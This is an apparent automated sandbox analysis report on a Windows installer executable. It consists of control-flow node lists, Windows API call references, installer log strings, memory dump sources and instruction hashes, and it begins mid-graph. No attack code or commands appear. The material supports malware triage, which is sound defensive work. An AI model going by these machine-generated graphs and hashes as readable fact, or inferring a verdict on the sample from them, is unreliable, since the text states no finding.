479d85 54089->54091 54092 479dab 54089->54092 54090 403400 4 API calls 54094 47a67c 54090->54094 54095 479d98 54091->54095 54324 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54091->54324 54093 479dbe 54092->54093 54325 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54092->54325 54098 403494 4 API calls 54093->54098 54099 403400 4 API calls 54094->54099 54096 403494 4 API calls 54095->54096 54096->54210 
54098->54210 54103 47a684 54099->54103 54105 479e13 54100->54105 54106 479e00 54100->54106 54104 403494 4 API calls 54101->54104 54103->54078 54104->54210 54108 479e63 54105->54108 54109 479e21 54105->54109 54107 403494 4 API calls 54106->54107 54107->54210 54114 479e84 54108->54114 54115 479e71 54108->54115 54110 479e3d 54109->54110 54111 479e2a 54109->54111 54113 479e50 54110->54113 54326 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54110->54326 54112 403494 4 API calls 54111->54112 54112->54210 54117 403494 4 API calls 54113->54117 54119 479ea5 54114->54119 54120 479e92 54114->54120 54118 403494 4 API calls 54115->54118 54117->54210 54118->54210 54122 479ec6 54119->54122 54123 479eb3 54119->54123 54121 403494 4 API calls 54120->54121 54121->54210 54125 479ee7 54122->54125 54126 479ed4 54122->54126 54124 403494 4 API calls 54123->54124 54124->54210 54128 479ef5 54125->54128 54129 479f24 54125->54129 54127 403494 4 API calls 54126->54127 54127->54210 54130 479f11 54128->54130 54131 479efe 54128->54131 54134 479f32 54129->54134 54135 479f61 54129->54135 54132 403494 4 API calls 54130->54132 54133 403494 4 API calls 54131->54133 54132->54210 54133->54210 54136 479f4e 54134->54136 54137 479f3b 54134->54137 54140 479f82 54135->54140 54141 479f6f 54135->54141 54210->54090 54313->54078 54315 403804 54314->54315 54317 40382f 54314->54317 54316 4038a4 4 API calls 54315->54316 54316->54317 54317->54078 54318->54078 54323->54085 54324->54095 54325->54093 54326->54113 54393->54058 54395 47c592 54394->54395 54399 47c5c8 54394->54399 54437 455228 54395->54437 54396 403420 4 API calls 54397 47c6dc 54396->54397 54397->53503 54399->54396 54400 47c6a5 54400->53503 54403 47c5bc 54403->54399 54403->54400 54405 47ad88 43 API calls 54403->54405 54408 47c651 54403->54408 54444 478218 54403->54444 54455 47830c 54403->54455 54459 47c12c 31 API calls 54403->54459 54404 47ad88 43 API calls 54404->54408 54405->54403 54406 42c8f8 5 API calls 54406->54408 54408->54403 54408->54404 
54408->54406 54409 42c920 5 API calls 54408->54409 54411 47c692 54408->54411 54460 47c274 58 API calls 54408->54460 54409->54408 54411->54399 54522 465e28 54412->54522 54415->53512 54417 42f3e0 54416->54417 54418 42f403 GetActiveWindow GetFocus 54417->54418 54419 41eeb4 2 API calls 54418->54419 54420 42f41a 54419->54420 54421 42f437 54420->54421 54422 42f427 RegisterClassA 54420->54422 54423 42f4c6 SetFocus 54421->54423 54424 42f445 CreateWindowExA 54421->54424 54422->54421 54426 403400 4 API calls 54423->54426 54424->54423 54425 42f478 54424->54425 54553 42428c 54425->54553 54428 42f4e2 54426->54428 54432 49339c 18 API calls 54428->54432 54429 42f4a0 54430 42f4a8 CreateWindowExA 54429->54430 54430->54423 54431 42f4be ShowWindow 54430->54431 54431->54423 54432->53532 54559 44ad68 54433->54559 54438 455239 54437->54438 54439 455246 54438->54439 54440 45523d 54438->54440 54469 45500c 29 API calls 54439->54469 54461 454f2c 54440->54461 54443 455243 54443->54403 54445 47822e 54444->54445 54446 47822a 54444->54446 54447 403450 4 API calls 54445->54447 54446->54403 54448 47823b 54447->54448 54449 478241 54448->54449 54450 47825b 54448->54450 54498 4780d8 54449->54498 54451 4780d8 19 API calls 54450->54451 54453 478257 54451->54453 54454 403400 4 API calls 54453->54454 54454->54446 54456 478318 54455->54456 54457 478333 54456->54457 54521 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54456->54521 54457->54403 54459->54403 54460->54408 54470 42dd44 54461->54470 54463 454f49 54464 454f97 54463->54464 54473 454e60 54463->54473 54464->54443 54467 454e60 6 API calls 54468 454f78 RegCloseKey 54467->54468 54468->54443 54469->54443 54471 42dd55 RegOpenKeyExA 54470->54471 54472 42dd4f 54470->54472 54471->54463 54472->54471 54478 42dc80 54473->54478 54475 403420 4 API calls 54476 454f12 54475->54476 54476->54467 54477 454e88 54477->54475 54481 42db28 54478->54481 54482 42db4e RegQueryValueExA 54481->54482 54483 42db93 54482->54483 54489 42db71 54482->54489 54484 403400 4 
API calls 54483->54484 54486 42dc5f 54484->54486 54485 42db8b 54487 403400 4 API calls 54485->54487 54486->54477 54487->54483 54488 4034e0 4 API calls 54488->54489 54489->54483 54489->54485 54489->54488 54490 403744 4 API calls 54489->54490 54491 42dbc8 RegQueryValueExA 54490->54491 54491->54482 54492 42dbe4 54491->54492 54492->54483 54493 4038a4 4 API calls 54492->54493 54494 42dc26 54493->54494 54495 42dc38 54494->54495 54497 403744 4 API calls 54494->54497 54496 403450 4 API calls 54495->54496 54496->54483 54497->54495 54499 4780f3 54498->54499 54501 478124 54499->54501 54509 4781b2 54499->54509 54516 477f8c 19 API calls 54499->54516 54504 478149 54501->54504 54517 477f8c 19 API calls 54501->54517 54505 47816a 54504->54505 54518 477f8c 19 API calls 54504->54518 54506 4781aa 54505->54506 54505->54509 54519 4529a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54505->54519 54510 477e10 54506->54510 54509->54453 54511 477e4b 54510->54511 54512 403450 4 API calls 54511->54512 54513 477e70 54512->54513 54520 476500 19 API calls 54513->54520 54515 477eb1 54515->54509 54516->54501 54517->54504 54518->54505 54519->54506 54520->54515 54521->54457 54523 403494 4 API calls 54522->54523 54524 465e56 54523->54524 54539 42daf0 54524->54539 54527 42daf0 5 API calls 54528 465e7a 54527->54528 54529 465d14 19 API calls 54528->54529 54530 465e84 54529->54530 54531 42daf0 5 API calls 54530->54531 54532 465e93 54531->54532 54542 465d8c 54532->54542 54535 42daf0 5 API calls 54536 465eac 54535->54536 54537 403400 4 API calls 54536->54537 54538 465ec1 54537->54538 54538->53507 54546 42da38 54539->54546 54543 465dac 54542->54543 54544 4078fc 19 API calls 54543->54544 54545 465df6 54544->54545 54545->54535 54547 42dae3 54546->54547 54550 42da58 54546->54550 54547->54527 54548 4037b8 4 API calls 54548->54550 54550->54547 54550->54548 54551 403800 4 API calls 54550->54551 54552 42c454 IsDBCSLeadByte 54550->54552 54551->54550 54552->54550 54554 4242be 54553->54554 54555 42429e 
GetWindowTextA 54553->54555 54557 403494 4 API calls 54554->54557 54556 4034e0 4 API calls 54555->54556 54558 4242bc 54556->54558 54557->54558 54558->54429 54562 44abe0 54559->54562 54563 44ac13 54562->54563 54564 414af8 4 API calls 54563->54564 54565 44ac26 54564->54565 54566 40357c 4 API calls 54565->54566 54567 44ac53 73A1A570 54565->54567 54566->54567 54573 41a1f8 54567->54573 54574 41a223 54573->54574 54575 41a2bf 54573->54575 54592 403520 54574->54592 54576 403400 4 API calls 54575->54576 54577 41a2d7 SelectObject 54576->54577 54593 4034e0 4 API calls 54592->54593 54594 40352a 54593->54594 54598 4649ff 54595->54598 54596 464ada 54606 4667a4 54596->54606 54597 464a92 54597->54596 54625 4185c8 7 API calls 54597->54625 54598->54596 54601 464a4f 54598->54601 54619 421a2c 54598->54619 54601->54597 54602 464a94 54601->54602 54603 464a89 54601->54603 54605 421a2c 7 API calls 54602->54605 54604 421a2c 7 API calls 54603->54604 54604->54597 54605->54597 54607 4667d4 54606->54607 54608 4667b5 54606->54608 54607->53560 54609 414b28 4 API calls 54608->54609 54610 4667c3 54609->54610 54611 414b28 4 API calls 54610->54611 54611->54607 54613 469f3d 54612->54613 54614 421a2c 7 API calls 54613->54614 54615 469f96 54614->54615 54615->53586 54617 466274 18 API calls 54615->54617 54616->53562 54617->53586 54618->53588 54620 421a84 54619->54620 54622 421a3a 54619->54622 54620->54601 54621 421a69 54621->54620 54634 421d38 SetFocus GetFocus 54621->54634 54622->54621 54626 408cc4 54622->54626 54625->54596 54627 408cd0 54626->54627 54635 406df4 LoadStringA 54627->54635 54630 403450 4 API calls 54631 408d01 54630->54631 54632 403400 4 API calls 54631->54632 54633 408d16 54632->54633 54633->54621 54634->54620 54636 4034e0 4 API calls 54635->54636 54637 406e21 54636->54637 54637->54630 54639 46b7e1 54638->54639 54640 414af8 4 API calls 54639->54640 54641 46b82e 54639->54641 54642 46b7f7 54640->54642 54643 403420 4 API calls 54641->54643 54826 466038 6 API calls 54642->54826 54645 46b8d8 
54643->54645 54645->53601 54819 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54645->54819 54646 46b7ff 54647 414b28 4 API calls 54646->54647 54648 46b80d 54647->54648 54649 46b81a 54648->54649 54651 46b833 54648->54651 54827 47d508 42 API calls 54649->54827 54652 46b84b 54651->54652 54653 46611c CharNextA 54651->54653 54828 47d508 42 API calls 54652->54828 54655 46b847 54653->54655 54655->54652 54656 46b861 54655->54656 54657 46b867 54656->54657 54658 46b87d 54656->54658 54829 47d508 42 API calls 54657->54829 54660 42c968 CharNextA 54658->54660 54661 46b88a 54660->54661 54661->54641 54830 4661a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54661->54830 54663 46b8a1 54664 450ab8 4 API calls 54663->54664 54665 46b8ae 54664->54665 54831 47d508 42 API calls 54665->54831 54668 480ab9 54667->54668 54669 480a8b 54667->54669 54671 4749c8 54668->54671 54832 49314c 18 API calls 54669->54832 54833 456f08 54671->54833 54674 4072b0 SetCurrentDirectoryA 54675 474a1e 54674->54675 54820->53609 54826->54646 54827->54641 54828->54641 54829->54641 54830->54663 54831->54641 54832->54668 54834 456f34 54833->54834 54835 45703c 54833->54835 55374 456c04 GetSystemTimeAsFileTime FileTimeToSystemTime 54834->55374 54836 45708d 54835->54836 55378 456774 6 API calls 54835->55378 54839 403400 4 API calls 54836->54839 54841 4570a2 54839->54841 54840 456f3c 54842 4078fc 19 API calls 54840->54842 54841->54674 54843 456fad 54842->54843 55375 456ef8 20 API calls 54843->55375 55374->54840 55378->54836 56577 431740 56538->56577 56540 403400 4 API calls 56541 43d2ca 56540->56541 56541->53667 56541->53668 56542 43d246 56542->56540 56544 43142a 56543->56544 56545 402648 4 API calls 56544->56545 56546 43145a 56545->56546 56547 492c58 56546->56547 56548 492d2d 56547->56548 56549 492c72 56547->56549 56554 492d70 56548->56554 56549->56548 56551 4335c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56549->56551 56553 403450 4 API calls 56549->56553 56582 408c14 LocalAlloc TlsSetValue 
TlsGetValue TlsGetValue 56549->56582 56583 4314f4 56549->56583 56551->56549 56553->56549 56555 492d8c 56554->56555 56591 4335c0 56555->56591 56557 492d91 56558 4314f4 4 API calls 56557->56558 56559 492d9c 56558->56559 56560 43cde8 56559->56560 56561 43ce15 56560->56561 56566 43ce07 56560->56566 56561->53678 56562 43ce91 56570 43cf4b 56562->56570 56594 4468d8 56562->56594 56564 43cedc 56600 43d5a4 56564->56600 56566->56561 56566->56562 56567 4468d8 4 API calls 56566->56567 56567->56566 56568 43d151 56568->56561 56620 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56568->56620 56570->56568 56571 43d132 56570->56571 56618 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56570->56618 56619 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56571->56619 56574->53680 56575->53682 56576->53669 56578 403494 4 API calls 56577->56578 56579 43174f 56578->56579 56580 431779 56579->56580 56581 403744 4 API calls 56579->56581 56580->56542 56581->56579 56582->56549 56584 431502 56583->56584 56587 431514 56583->56587 56589 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56584->56589 56586 431536 56586->56549 56587->56586 56590 431494 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56587->56590 56589->56587 56590->56586 56592 402648 4 API calls 56591->56592 56593 4335cf 56592->56593 56593->56557 56595 4468f7 56594->56595 56596 4468fe 56594->56596 56621 446684 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56595->56621 56597 4314f4 4 API calls 56596->56597 56599 44690e 56597->56599 56599->56564 56601 43d5c0 56600->56601 56614 43d5ed 56600->56614 56602 402660 4 API calls 56601->56602 56601->56614 56602->56601 56603 43d622 56603->56570 56605 43f6f9 56605->56603 56607 43c18c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56607->56614 56609 446878 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56609->56614 56612 43356c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56612->56614 56613 43336c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56613->56614 56614->56603 
56614->56605 56614->56607 56614->56609 56614->56612 56614->56613 56615 435ea4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56614->56615 56616 431494 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56614->56616 56617 446684 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56614->56617 56622 438f34 56614->56622 56628 4366a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56614->56628 56629 43d49c 18 API calls 56614->56629 56630 433588 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56614->56630 56615->56614 56616->56614 56617->56614 56618->56570 56619->56568 56620->56568 56621->56596 56628->56614 56629->56614 56630->56614 56633 47efd8 56634 47efe1 56633->56634 56636 47f00c 56633->56636 56634->56636 56637 47effe 56634->56637 56635 47f04b 56639 47f05e 56635->56639 56640 47f06b 56635->56640 56636->56635 57044 47d9dc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 56636->57044 57042 4756fc 188 API calls 56637->57042 56645 47f062 56639->56645 56646 47f0a0 56639->56646 56642 47f085 56640->56642 56643 47f074 56640->56643 57047 47dbe8 42 API calls 56642->57047 57046 47db78 42 API calls 56643->57046 56644 47f03e 57045 47db78 42 API calls 56644->57045 56656 47f0e3 56645->56656 56657 47f0fe 56645->56657 56658 47f066 56645->56658 56650 47f0c4 56646->56650 56651 47f0a9 56646->56651 56647 47f003 56647->56636 57043 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56647->57043 57049 47dbe8 42 API calls 56650->57049 57048 47dbe8 42 API calls 56651->57048 57050 47dbe8 42 API calls 56656->57050 57051 47dbe8 42 API calls 56657->57051 56661 47f127 56658->56661 56662 47f145 56658->56662 56663 47f13c 56661->56663 57052 47db78 42 API calls 56661->57052 57054 47d874 24 API calls 56662->57054 57053 47d874 24 API calls 56663->57053 56667 47f143 56668 47f155 56667->56668 56669 47f15b 56667->56669 56670 47f159 56668->56670 56767 47db54 56668->56767 56669->56670 56671 47db54 42 API calls 56669->56671 56772 47b154 56670->56772 56671->56670 57065 47d508 42 API calls 56767->57065 56769 
47db6f 57066 408be8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 56769->57066 56773 42d864 GetWindowsDirectoryA 56772->56773 56774 47b172 56773->56774 56775 403450 4 API calls 56774->56775 56776 47b17f 56775->56776 56777 42d890 GetSystemDirectoryA 56776->56777 56778 47b187 56777->56778 56779 403450 4 API calls 56778->56779 56780 47b194 56779->56780 56781 42d8bc 6 API calls 56780->56781 56782 47b19c 56781->56782 56783 403450 4 API calls 56782->56783 56784 47b1a9 56783->56784 56785 47b1b2 56784->56785 56786 47b1ce 56784->56786 57087 42d1d4 56785->57087 56788 403400 4 API calls 56786->56788 56790 47b1cc 56788->56790 56792 47b213 56790->56792 56793 42c898 5 API calls 56790->56793 56791 403450 4 API calls 56791->56790 57067 47afdc 56792->57067 56796 47b1ee 56793->56796 56798 403450 4 API calls 56796->56798 56797 403450 4 API calls 56799 47b22f 56797->56799 56800 47b1fb 56798->56800 56801 47b24d 56799->56801 56802 4035c0 4 API calls 56799->56802 56800->56792 56804 403450 4 API calls 56800->56804 56803 47afdc 8 API calls 56801->56803 56802->56801 56805 47b25c 56803->56805 56804->56792 56806 403450 4 API calls 56805->56806 56807 47b269 56806->56807 56808 47b291 56807->56808 56809 42c40c 5 API calls 56807->56809 57042->56647 57044->56644 57045->56635 57046->56658 57047->56658 57048->56658 57049->56658 57050->56658 57051->56658 57052->56663 57053->56667 57054->56667 57065->56769 57068 42dd44 RegOpenKeyExA 57067->57068 57069 47b002 57068->57069 57070 47b006 57069->57070 57071 47b028 57069->57071 57072 42dc74 6 API calls 57070->57072 57073 403400 4 API calls 57071->57073 57074 47b012 57072->57074 57075 47b02f 57073->57075 57076 47b01d RegCloseKey 57074->57076 57077 403400 4 API calls 57074->57077 57075->56797 57076->57075 57077->57076 57088 4038a4 4 API calls 57087->57088 57089 42d1e7 57088->57089 57090 42d1fe GetEnvironmentVariableA 57089->57090 57094 42d211 57089->57094 57097 42daf8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57089->57097 57090->57089 57091 
control_flow_graph (continued from the previous section and beginning mid-graph; the rendered graph is on the original page). Functions in this part and the APIs their nodes reach: 00416420: GetClassInfoA, RegisterClassA, UnregisterClassA. 0049706C: GetModuleHandleA, GetCommandLineA, GetProcAddress (three times), SetProcessDEPPolicy, GetVersionExA, GetSystemDefaultLCID, GetLocaleInfoA, LoadStringA, LocalAlloc/TlsSetValue/TlsGetValue, GetCurrentThreadId, plus an unresolved call to 6F551CD0. 0041EE64: IsWindowVisible, IsWindowEnabled, EnableWindow. 030E2127 and 030E1070 (code outside the 00400000 image): both call 0045CFF4, which calls VirtualAlloc. 0041FB68: GetWindowLongA, GetSystemMetrics, SetScrollInfo, GetScrollPos, SetScrollPos, IsWindowVisible, ScrollWindow, SetWindowPos. 004205A8: MulDiv, KiUserCallbackDispatcher, DeleteObject, LoadStringA. 00440BE8 and 0040CE34: WriteFile. 004222F4: GetMenu, SetMenu, GetMenuItemCount, GetMenuStringA, GetMenuState. 00447F7C: GetLastError. 0040D07C: GlobalAlloc, GlobalLock, GlobalHandle, GlobalUnlock, GlobalReAlloc, GlobalFree. 004165FC: unresolved call to 73A25CF0. 0044ACFC and 0047EF3E: only internal subcalls with API counts are shown.
                                                                              Strings
                                                                              • Installing into GAC, xrefs: 004706D1
                                                                              • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046FE7A
                                                                              • Will register the file (a DLL/OCX) later., xrefs: 004704DC
                                                                              • Dest filename: %s, xrefs: 0046F878
                                                                              • Version of our file: %u.%u.%u.%u, xrefs: 0046FAD4
                                                                              • Stripped read-only attribute., xrefs: 0046FEAB
                                                                              • Version of existing file: %u.%u.%u.%u, xrefs: 0046FB60
                                                                              • Incrementing shared file count (32-bit)., xrefs: 00470562
                                                                              • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 0046FC99
                                                                              • Time stamp of our file: %s, xrefs: 0046F97F
                                                                              • User opted not to overwrite the existing file. Skipping., xrefs: 0046FE31
                                                                              • Same time stamp. Skipping., xrefs: 0046FD39
                                                                              • -- File entry --, xrefs: 0046F6DF
                                                                              • Existing file has a later time stamp. Skipping., xrefs: 0046FDB3
                                                                              • Incrementing shared file count (64-bit)., xrefs: 00470549
                                                                              • Time stamp of existing file: (failed to read), xrefs: 0046FA1B
                                                                              • Non-default bitness: 32-bit, xrefs: 0046F89F
                                                                              • .tmp, xrefs: 0046FF9B
                                                                              • Failed to strip read-only attribute., xrefs: 0046FEB7
                                                                              • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 0046FCB4
                                                                              • Will register the file (a type library) later., xrefs: 004704D0
                                                                              • Uninstaller requires administrator: %s, xrefs: 00470159
                                                                              • , xrefs: 0046FBB3, 0046FD84, 0046FE02
                                                                              • Installing the file., xrefs: 0046FEED
                                                                              • @, xrefs: 0046F794
                                                                              • InUn, xrefs: 00470129
                                                                              • Dest file exists., xrefs: 0046F99F
                                                                              • Time stamp of existing file: %s, xrefs: 0046FA0F
                                                                              • Skipping due to "onlyifdoesntexist" flag., xrefs: 0046F9B2
                                                                              • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 0046FCA8
                                                                              • Existing file is protected by Windows File Protection. Skipping., xrefs: 0046FDD0
                                                                              • Existing file is a newer version. Skipping., xrefs: 0046FBE6
                                                                              • Dest file is protected by Windows File Protection., xrefs: 0046F8D1
                                                                              • Non-default bitness: 64-bit, xrefs: 0046F893
                                                                              • Same version. Skipping., xrefs: 0046FCC9
                                                                              • Version of existing file: (none), xrefs: 0046FCDE
                                                                              • Couldn't read time stamp. Skipping., xrefs: 0046FD19
                                                                              • Time stamp of our file: (failed to read), xrefs: 0046F98B
                                                                              • Version of our file: (none), xrefs: 0046FAE0
                                                                              • Skipping due to "onlyifdestfileexists" flag., xrefs: 0046FEDE
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                              • API String ID: 0-4021121268
                                                                              • Opcode ID: 39296d02e86210ba95a122c72ed18eadff40a57c25b7f45ff7f5bcbf2b67098f
                                                                              • Instruction ID: cb3b5b092a3a8f8c122efd66c5c5c6ee12dad63ca724b3077347a87130114cb0
                                                                              • Opcode Fuzzy Hash: 39296d02e86210ba95a122c72ed18eadff40a57c25b7f45ff7f5bcbf2b67098f
                                                                              • Instruction Fuzzy Hash: 9B928234A04288DFCB11DFA5D445BDDBBB1AF05304F5480ABE884BB392D7789E49CB5A

                                                                              Control-flow Graph

                                                                              control_flow_graph (rendered graph on the original page). Function 0042DFC4-0042E1B7: AllocateAndInitializeSid; GetVersion; GetModuleHandleA/GetProcAddress; CheckTokenMembership, then FreeSid. If CheckTokenMembership is not taken: GetCurrentThread/OpenThreadToken, on failure GetLastError and GetCurrentProcess/OpenProcessToken; GetTokenInformation twice (GetLastError in between); a loop over EqualSid; CloseHandle; FreeSid.
                                                                              APIs
                                                                              • AllocateAndInitializeSid.ADVAPI32(00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DFFE
                                                                              • GetVersion.KERNEL32(00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E01B
                                                                              • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E034
                                                                              • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E03A
                                                                              • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E1A8,?,00498788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E04F
                                                                              • FreeSid.ADVAPI32(00000000,0042E1AF,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E1A2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                              • String ID: CheckTokenMembership$advapi32.dll
                                                                              • API String ID: 2252812187-1888249752
                                                                              • Opcode ID: de8d44d672a8929b680763389e92ce8a04460e4e95b38bd413b506cbd288daf1
                                                                              • Instruction ID: 81e9a68d7eb5b753086264e3ea48cb09d3699a943d7b2bc0788aba7922d59162
                                                                              • Opcode Fuzzy Hash: de8d44d672a8929b680763389e92ce8a04460e4e95b38bd413b506cbd288daf1
                                                                              • Instruction Fuzzy Hash: DE51B271B40625AEEB10EAF69C42BBF77ACDB09704F54047BB900F7282D5BC89158A69

                                                                              Control-flow Graph

                                                                              control_flow_graph (rendered graph on the original page). Function 00423C1C-0042416A: a large dispatch over internal subcalls; the APIs reached directly are IsIconic, GetFocus, SetFocus, SendMessageA, PostMessageA, IsWindowEnabled and IsWindowVisible.
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4d8523de1586cc0fe21acf482102c1559735113aa6e2fedad80b263b22362a32
                                                                              • Instruction ID: b8faa7015d3197e79f6d1719c020e5f6697e37216349d11362fcbf3b9a892ac2
                                                                              • Opcode Fuzzy Hash: 4d8523de1586cc0fe21acf482102c1559735113aa6e2fedad80b263b22362a32
                                                                              • Instruction Fuzzy Hash: 42E1A230700125EFD704EF69E989A6EB7B5EF94304F9480A6E545AB352C73CEE91DB08
                                                                              APIs
                                                                                • Part of subcall function 00493D2C: GetWindowRect.USER32(00000000), ref: 00493D42
                                                                              • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00466E8B
                                                                                • Part of subcall function 0041D6C0: GetObjectA.GDI32(?,00000018,00466EA5), ref: 0041D6EB
                                                                                • Part of subcall function 00466898: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046693B
                                                                                • Part of subcall function 00466898: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00466961
                                                                                • Part of subcall function 00466898: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004669B8
                                                                                • Part of subcall function 00466254: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466F40,00000000,00000000,00000000,0000000C,00000000), ref: 0046626C
                                                                                • Part of subcall function 00493FB0: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00493FBA
                                                                                • Part of subcall function 0042EBAC: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EC1C
                                                                                • Part of subcall function 0042EBAC: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EC39
                                                                                • Part of subcall function 00493C7C: 73A1A570.USER32(00000000,?,?,?), ref: 00493C9E
                                                                                • Part of subcall function 00493C7C: SelectObject.GDI32(?,00000000), ref: 00493CC4
                                                                                • Part of subcall function 00493C7C: 73A1A480.USER32(00000000,?,00493D22,00493D1B,?,00000000,?,?,?), ref: 00493D15
                                                                                • Part of subcall function 00493FA0: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00493FAA
                                                                              • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0212D868,0212F4BC,?,?,0212F4EC,?,?,0212F53C,?), ref: 00467B3B
                                                                              • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00467B4C
                                                                              • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00467B64
                                                                                • Part of subcall function 0042A06C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A082
                                                                              Strings
